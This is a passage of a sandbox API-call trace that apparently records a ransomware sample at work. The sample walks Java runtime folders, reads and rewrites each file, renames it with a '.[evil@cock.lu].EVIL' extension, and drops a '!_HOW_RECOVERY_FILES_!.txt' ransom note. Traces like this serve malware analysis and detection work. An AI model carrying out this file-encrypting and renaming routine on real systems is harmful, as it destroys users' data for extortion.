(lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\messages_zh_TW.properties" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\deploy\\messages_zh_tw.properties"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\messages_zh_TW.properties.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\deploy\\messages_zh_tw.properties.[evil@cock.lu].evil")) returned 1 [0094.541] ??_V@YAXPEAX@Z () returned 0x1 [0094.545] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\messages_zh_TW.properties", dwFileAttributes=0x0) returned 0 [0094.545] FindNextFileW (in: hFindFile=0x84b11ddb00, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0094.545] wcsstr (_Str="splash.gif", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0094.545] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\splash.gif") returned 57 [0094.545] wcscmp (_String1="splash.gif", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0094.545] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="splash.gif") returned 0x0 [0094.545] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\splash.gif") returned 0x39 [0094.545] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\splash.gif" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\deploy\\splash.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0094.547] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x218e, lpOverlapped=0x0) returned 1 [0094.551] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0094.551] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0094.551] _errno () returned 0x84b1160840 [0094.551] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0094.551] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040*, nNumberOfBytesToWrite=0x21a0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x21a0, lpOverlapped=0x0) returned 1 [0094.551] CloseHandle (hObject=0x1a8) returned 1 [0094.551] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\splash.gif", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0094.551] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0094.551] __uncaught_exception () returned 0x84b1160800 [0094.551] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0094.552] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\splash.gif" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\deploy\\splash.gif"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\splash.gif.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\deploy\\splash.gif.[evil@cock.lu].evil")) returned 1 [0094.552] ??_V@YAXPEAX@Z () returned 0x1 [0094.556] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\splash.gif", dwFileAttributes=0x0) returned 0 [0094.556] FindNextFileW (in: hFindFile=0x84b11ddb00, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0094.556] wcsstr (_Str="splash@2x.gif", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0094.556] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\splash@2x.gif") returned 60 [0094.556] wcscmp (_String1="splash@2x.gif", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0094.556] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="splash@2x.gif") returned 0x0 [0094.556] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\splash@2x.gif") returned 0x3c [0094.556] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\splash@2x.gif" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\deploy\\splash@2x.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0094.559] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x3bac, lpOverlapped=0x0) returned 1 [0094.562] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0094.562] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0094.562] _errno () returned 0x84b1160840 [0094.562] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0094.562] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040*, nNumberOfBytesToWrite=0x3bc0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x3bc0, lpOverlapped=0x0) returned 1 [0094.563] CloseHandle (hObject=0x1a8) returned 1 [0094.563] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\splash@2x.gif", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0094.563] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0094.563] __uncaught_exception () returned 0x84b1160800 [0094.563] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0094.563] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\splash@2x.gif" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\deploy\\splash@2x.gif"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\splash@2x.gif.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\deploy\\splash@2x.gif.[evil@cock.lu].evil")) returned 1 [0094.564] ??_V@YAXPEAX@Z () returned 0x1 [0094.568] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\splash@2x.gif", dwFileAttributes=0x0) returned 0 [0094.568] FindNextFileW (in: hFindFile=0x84b11ddb00, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0094.568] wcsstr (_Str="splash_11-lic.gif", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0094.568] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\splash_11-lic.gif") returned 64 [0094.568] wcscmp (_String1="splash_11-lic.gif", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0094.568] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="splash_11-lic.gif") returned 0x0 [0094.568] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\splash_11-lic.gif") returned 0x40 [0094.568] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\splash_11-lic.gif" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\deploy\\splash_11-lic.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0094.570] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1e7d, lpOverlapped=0x0) returned 1 [0094.574] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0094.574] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0094.574] _errno () returned 0x84b1160840 [0094.574] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0094.574] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040*, nNumberOfBytesToWrite=0x1e80, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1e80, lpOverlapped=0x0) returned 1 [0094.574] CloseHandle (hObject=0x1a8) returned 1 [0094.574] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\splash_11-lic.gif", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0094.575] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0094.575] __uncaught_exception () returned 0x84b1160800 [0094.575] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0094.575] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\splash_11-lic.gif" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\deploy\\splash_11-lic.gif"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\splash_11-lic.gif.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\deploy\\splash_11-lic.gif.[evil@cock.lu].evil")) returned 1 [0094.576] ??_V@YAXPEAX@Z () returned 0x1 [0094.579] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\splash_11-lic.gif", dwFileAttributes=0x0) returned 0 [0094.580] FindNextFileW (in: hFindFile=0x84b11ddb00, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0094.580] wcsstr (_Str="splash_11@2x-lic.gif", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0094.580] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\splash_11@2x-lic.gif") returned 67 [0094.580] wcscmp (_String1="splash_11@2x-lic.gif", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0094.580] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="splash_11@2x-lic.gif") returned 0x0 [0094.580] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\splash_11@2x-lic.gif") returned 0x43 [0094.580] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\splash_11@2x-lic.gif" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\deploy\\splash_11@2x-lic.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0094.583] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x2fda, lpOverlapped=0x0) returned 1 [0094.586] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0094.586] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0094.586] _errno () returned 0x84b1160840 [0094.586] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0094.586] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040*, nNumberOfBytesToWrite=0x2fe0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2fe0, lpOverlapped=0x0) returned 1 [0094.586] CloseHandle (hObject=0x1a8) returned 1 [0094.587] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\splash_11@2x-lic.gif", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0094.587] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0094.587] __uncaught_exception () returned 0x84b1160800 [0094.587] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0094.587] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\splash_11@2x-lic.gif" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\deploy\\splash_11@2x-lic.gif"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\splash_11@2x-lic.gif.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\deploy\\splash_11@2x-lic.gif.[evil@cock.lu].evil")) returned 1 [0094.588] ??_V@YAXPEAX@Z () returned 0x1 [0094.592] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\splash_11@2x-lic.gif", dwFileAttributes=0x0) returned 0 [0094.592] FindNextFileW (in: hFindFile=0x84b11ddb00, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 0 [0094.592] FindClose (in: hFindFile=0x84b11ddb00 | out: hFindFile=0x84b11ddb00) returned 1 [0094.592] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy") returned 0x2e [0094.592] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0094.592] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0094.592] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0094.593] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0094.593] __uncaught_exception () returned 0x84b1160800 [0094.593] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0094.594] FindNextFileW (in: hFindFile=0x84b11dd0e0, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0094.594] wcsstr (_Str="deploy.jar", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0094.594] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy.jar") returned 50 [0094.594] wcscmp (_String1="deploy.jar", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0094.594] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="deploy.jar") returned 0x0 [0094.594] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy.jar") returned 0x32 [0094.594] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy.jar" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\deploy.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0094.598] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e29040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x100000, lpOverlapped=0x0) returned 1 [0094.756] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0094.756] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0094.756] _errno () returned 0x84b1160840 [0094.757] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0094.757] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e29040*, nNumberOfBytesToWrite=0x100020, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x100020, lpOverlapped=0x0) returned 1 [0094.773] CloseHandle (hObject=0x1a4) returned 1 [0094.773] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy.jar", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0094.774] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0094.774] __uncaught_exception () returned 0x84b1160800 [0094.774] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0094.802] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy.jar" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\deploy.jar"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy.jar.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\deploy.jar.[evil@cock.lu].evil")) returned 1 [0094.803] ??_V@YAXPEAX@Z () returned 0x1 [0094.807] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy.jar", dwFileAttributes=0x0) returned 0 [0094.807] FindNextFileW (in: hFindFile=0x84b11dd0e0, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0094.807] wcsstr (_Str="ext", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0094.807] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\ext") returned 43 [0094.807] wcscmp (_String1=".", _String2="ext") returned -1 [0094.807] wcscmp (_String1="..", _String2="ext") returned -1 [0094.807] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\ext") returned 0x2b [0094.807] wcscpy_s (in: _Destination=0x84b0fddc50, _SizeInWords=0x104, _Source="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\ext" | out: _Destination="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\ext") returned 0x0 [0094.807] wcscat (in: _Dest=0x84b0fddc50, _Source="\\*" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\*") returned="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\*" [0094.808] FindFirstFileW (in: lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\*", lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 0x84b11dd920 [0094.856] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0094.856] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\.") returned 45 [0094.856] wcscmp (_String1=".", _String2=".") returned 0 [0094.856] FindNextFileW (in: hFindFile=0x84b11dd920, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0094.856] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0094.856] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\..") returned 46 [0094.856] wcscmp (_String1=".", _String2="..") returned -1 [0094.856] wcscmp (_String1="..", _String2="..") returned 0 [0094.856] FindNextFileW (in: hFindFile=0x84b11dd920, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0094.856] wcsstr (_Str="access-bridge-64.jar", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0094.857] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\access-bridge-64.jar") returned 64 [0094.857] wcscmp (_String1="access-bridge-64.jar", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0094.857] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="access-bridge-64.jar") returned 0x0 [0094.857] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\access-bridge-64.jar") returned 0x40 [0094.857] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\access-bridge-64.jar" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\ext\\access-bridge-64.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0094.859] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x2de78, lpOverlapped=0x0) returned 1 [0094.918] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0094.918] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0094.918] _errno () returned 0x84b1160840 [0094.919] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0094.919] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040*, nNumberOfBytesToWrite=0x2de80, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2de80, lpOverlapped=0x0) returned 1 [0094.919] CloseHandle (hObject=0x1a8) returned 1 [0094.920] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\access-bridge-64.jar", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0094.920] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0094.920] __uncaught_exception () returned 0x84b1160800 [0094.920] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0094.920] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\access-bridge-64.jar" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\ext\\access-bridge-64.jar"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\access-bridge-64.jar.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\ext\\access-bridge-64.jar.[evil@cock.lu].evil")) returned 1 [0094.921] ??_V@YAXPEAX@Z () returned 0x1 [0094.929] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\access-bridge-64.jar", dwFileAttributes=0x0) returned 0 [0094.929] FindNextFileW (in: hFindFile=0x84b11dd920, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0094.929] wcsstr (_Str="cldrdata.jar", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0094.929] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\cldrdata.jar") returned 56 [0094.929] wcscmp (_String1="cldrdata.jar", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0094.929] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="cldrdata.jar") returned 0x0 [0094.929] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\cldrdata.jar") returned 0x38 [0094.929] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\cldrdata.jar" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\ext\\cldrdata.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0094.931] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x100000, lpOverlapped=0x0) returned 1 [0095.170] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0095.171] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0095.171] _errno () returned 0x84b1160840 [0095.172] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.172] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040*, nNumberOfBytesToWrite=0x100020, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x100020, lpOverlapped=0x0) returned 1 [0095.386] CloseHandle (hObject=0x1a8) returned 1 [0095.386] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\cldrdata.jar", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0095.386] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0095.386] __uncaught_exception () returned 0x84b1160800 [0095.386] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0095.387] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\cldrdata.jar" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\ext\\cldrdata.jar"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\cldrdata.jar.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\ext\\cldrdata.jar.[evil@cock.lu].evil")) returned 1 [0095.388] ??_V@YAXPEAX@Z () returned 0x1 [0095.391] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\cldrdata.jar", dwFileAttributes=0x0) returned 0 [0095.391] FindNextFileW (in: hFindFile=0x84b11dd920, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0095.391] wcsstr (_Str="dnsns.jar", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0095.391] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\dnsns.jar") returned 53 [0095.391] wcscmp (_String1="dnsns.jar", 